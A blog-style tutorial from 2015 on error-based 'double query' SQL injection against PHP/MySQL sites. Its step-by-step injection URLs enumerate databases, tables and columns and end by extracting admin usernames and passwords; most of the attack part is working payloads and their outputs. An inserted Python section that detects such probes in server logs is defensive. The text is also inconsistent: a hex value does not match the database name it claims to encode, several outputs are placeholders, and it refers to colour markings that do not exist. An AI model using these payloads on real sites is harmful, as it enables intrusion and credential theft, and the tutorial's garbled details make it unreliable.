
Saturday, 7 February 2015

Error Based SQLi Tutorial


What do we need?
1. This tutorial.
2. Notepad. Because using a pen and paper would take too long.
3. A vulnerable site.
4. I strongly suggest the HackBar for this! It gives you a clear overview of the code,
and it is very easy to combine with this tutorial.
Part 1. Recognizing the injection.
— Checking vulnerability.
— Checking column count.
— Checking union statement.
Part 2. Extracting information with double query!
— Exploit codes
+ version
+ database
+ database user
+ table count
+ table names
+ column count
+ column names
+ Extracting information
— Output exploit.
+ version
+ database
+ database user
+ table count
+ table names
+ column count
+ column names
+ Extracting information
Let's start.
Part 1. Recognizing the injection.
1. Checking vulnerability.
Enter ' after the link:
http://www.[site].com/page.php?id=1
http://www.[site].com/page.php?id=1'
If something like this pops up, then it is vulnerable:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1
1. Checking column count.
Code:
http://www.[site].com/page.php?id=1+order+by+1--+- [no error]
http://www.[site].com/page.php?id=1+order+by+99--+- [!!error!!]
http://www.[site].com/page.php?id=1+order+by+2--+- [no error]
http://www.[site].com/page.php?id=1+order+by+3--+- [no error]
http://www.[site].com/page.php?id=1+order+by+4--+- [error]
Why do I do order by 99?
To check whether we have to use a string injection.
If you do not get an error when you use order+by+99--+-
then you need string injection (explained in the basic tutorial).
Now that we have this part, let's move on to the union statement.
We know we have 3 columns now.
1. Checking Union select statement.
Code:
http://www.[site].com/page.php?id=1+union+select+1,2,3--+-
You do not get to see any content with numbers.
Instead you get this error!
Code:
"The used SELECT statements have a different number of columns"
We all know what that means.
This is where double query jumps in!
Part 2. Extracting information with double query!
2. Exploit codes. Version
Finding the version:
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now this is a hell of a code!
But it actually just says:
We select the version as char from the database tables with a limit 0,1 to get the first,
and we close with and 1=1, which means true.
It's hard for me to explain this full code.
I tried to keep it as simple as possible.
2. Exploit Output. Version
Code:
Duplicate entry '~'5.0.91'~1' for key 1
The lucky part about this method is we get the answer in the error.
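The probing steps in Part 1 and the double query above leave a recognizable trail in the web server's access log, and the whole method depends on the page echoing MySQL's error text back to the client. The following Python is an added example, not part of the original tutorial, that tags constructed access-log lines with the tutorial step they correspond to, flags a client that runs several of them, and checks a response body for the two error messages quoted here; the log format, addresses and threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original page); the query strings reproduce
# the probing sequence the tutorial walks through. Note the status stays 200 throughout:
# PHP prints the MySQL error into an otherwise normal page, so status codes will not flag it.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Feb/2015:10:00:02 +0000] "GET /page.php?id=1%27 HTTP/1.1" 200 311
10.0.0.5 - - [07/Feb/2015:10:00:03 +0000] "GET /page.php?id=1+order+by+1--+- HTTP/1.1" 200 5120
10.0.0.5 - - [07/Feb/2015:10:00:04 +0000] "GET /page.php?id=1+order+by+99--+- HTTP/1.1" 200 311
10.0.0.5 - - [07/Feb/2015:10:00:05 +0000] "GET /page.php?id=1+union+select+1,2,3--+- HTTP/1.1" 200 311
10.0.0.5 - - [07/Feb/2015:10:00:06 +0000] "GET /index.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20version()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 290
10.0.0.9 - - [07/Feb/2015:10:00:07 +0000] "GET /page.php?id=42 HTTP/1.1" 200 4880
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) ')  # captures client and request path

# One signature per step of the tutorial's workflow, applied to the decoded, lower-cased path.
SIGNATURES = [
    ("quote-probe", re.compile(r"\?id=\d+'")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+\s*--")),
    ("union-probe", re.compile(r"\bunion\s+select\b")),
    ("double-query", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)[\s\S]*?\bgroup\s+by\b")),
    ("schema-walk", re.compile(r"\binformation_schema\.(tables|columns|schemata)\b")),
]

def classify_request(raw_path):
    """Signature names matching a request path after URL decoding ('+' becomes a space)."""
    decoded = unquote_plus(raw_path).lower()
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan_log(text):
    """(client, path, tags) for every request that matches at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            client, path = m.groups()
            tags = classify_request(path)
            if tags:
                hits.append((client, path, tags))
    return hits

def clients_enumerating(hits, threshold=3):
    """Clients with `threshold` or more flagged requests, i.e. column/schema enumeration."""
    counts = {}
    for client, _path, _tags in hits:
        counts[client] = counts.get(client, 0) + 1
    return sorted(c for c, n in counts.items() if n >= threshold)

# Response-side check for the two MySQL messages the tutorial depends on; a page that
# echoes either one hands the database's answer straight to the client.
ERROR_LEAK_RE = re.compile(r"You have an error in your SQL syntax|Duplicate entry '.*' for key")

def leaks_db_error(body):
    return ERROR_LEAK_RE.search(body) is not None
```

Turning off error display in the application (and logging the error server-side instead) removes the channel this technique reads from; the request-side signatures remain useful because the probing still shows up in the log.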
2. Exploit codes. Database
Finding the database:
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Lets keep it easy.
This code does exactly the same as the one for version.
Only this one extracts database name.
2. Exploit Output. Database
Code:
Duplicate entry '~'Cyb3r_1' for key 1
The error says the database is cyb3r_1.
This is related to the database info:
1. Count of databases.
2. Gather other database names.
1:
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
If it says you have more than one database,
you can use this exploit to get the names one by one.
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
It's not hard to get more than one:
just keep increasing the limit 0,1.
If you do 1,1 you get the next database in line.
If you do 2,1 you get the second database in line.
Not that hard at all.
2. Exploit codes. Finding database user
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
This says:
Select count and cast user() to gather user information from the current database,
with a limit.
If you understand the other exploits, this one won't be that hard.
2. Exploit Output. Finding Database User.
Code:
Duplicate entry '~'RS_user@localhost'~1' for key 1
So the user is RS_user.
2. Exploit code. Finding table count.
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEX)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now take a close look at this code.
We need to change the database name we extracted before into hex.
Where the code says 0xHEX,
we have to put 0x followed by the hex, obviously.
My database name was cyb3r_1,
encoded in hex: 5265616c537465656c5f31
We can encode this using Swingnote hex, or if you have the HackBar,
use that.
Exploit Code to execute:
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0x5265616c537465656c5f31)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2. Exploit Output. Finding table count.
Code:
Duplicate entry '~'number_of_table(e.g 10)~1' for key 1
The error says I have 3 tables. In most cases there are a lot more!
2. Exploit code. Finding table names.
This is going to happen one by one, as before with the database names.
We will have to use the limit again.
PHP Code:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Again, look closely at the code.
We need to hex the same part again:
0xHEX, that's the same as before.
Again the database name; mine was 5265616c537465656c5f31.
This time we also need to use the limits
to get the table names.
Look at the part after 0xHEX in the code: it says limit 0,1.
It is that one we need to increase.
Same as before: 0,1 first, 1,1 second and 2,1 third.
I only have 3. If you have more, keep increasing until you have all of them.
2. Exploit Output. Finding table names.
1:

Duplicate entry '~'Tbl_shop'~1' for key 1

2:
Duplicate entry '~'Tbl_admin'~1' for key 1
3:
Duplicate entry '~'Tbl_news'~1' for key 1
So I have my 3 table names:
tbl_shop, tbl_admin, tbl_news.
The admin table is interesting, let's look inside!
2. Exploit code. Finding column count.
Well this is not so different from finding table count.
Only some parts change in the exploit code so here it is:
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xHEXDB AND table_name=0xHEXTABLE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
This time we have 2 hexes.
This is annoying if you do not have a HackBar.
That's why I suggested it at the top of this tutorial!
Now look at the 2 parts in the code.
First: 0xHEXDB
Second: 0xHEXTABLE
My hex for the db was: 5265616c537465656c5f31
My hex for tbl_admin is: 74626c5f61646d696e
Full exploit code in my case,
to give you an overview of things:

http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0x5265616c537465656c5f31 AND table_name=0x74626c5f61646d696e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2. Exploit Output. finding Column count

Duplicate entry '~'number_of_column(e.g 2)~1' for key 1
We have 2 columns.
Now to find out which ones?
2. Exploit code. Finding column names.

http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x5265616c537465656c5f31 AND table_name=0x74626c5f61646d696e LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
As you can see, again we have our 2 hexes:
database name and table name,
but this time with a limit at the end, after the table name hex.
We will of course need to increase that limit to get all the names inside.
Limit 0,1 and limit 1,1 should do for me, since I have only 2 columns.
Which are:
2. Exploit Output. Finding column names.
1:

Duplicate entry '~'user'~1' for key 1

2:

Duplicate entry '~'pass'~1' for key 1
2. Exploit code. Extracting names and passwords.
I will need your attention here for a second.
Read carefully what I posted below the exploit code.
http://www.[site].com/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_admin.user as char),0x27,0x7e) FROM `cyb3r_1`.admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
This is a very dense code.
You will have to add a lot of your own information here.
At this part:
(SELECT concat(0x7e,0x27,cast(tbl_admin.user as char)
you will need to change the red parts to your own information.
The first word is the admin table I got.
The second part is the table name I got, which was user.
At this part of the code:
FROM `cyb3r_1`.tbl_admin LIMIT 0,1) )
here the first word is our current database,
the second word again our table name.
And at the end of this line we have a limit, the green part.
You need to increase this limit until you have a hit, or until you have all the users inside the user column.
We need to do exactly the same for pass.
Only change user in the exploit code to pass!
2. Exploit Output. Finding admin credentials.
1:
Duplicate entry '~'Cyb3rh4ck3r'~1' for key 1
2:
Duplicate entry '~'TeamIHC'~1' for key 1
That's all.
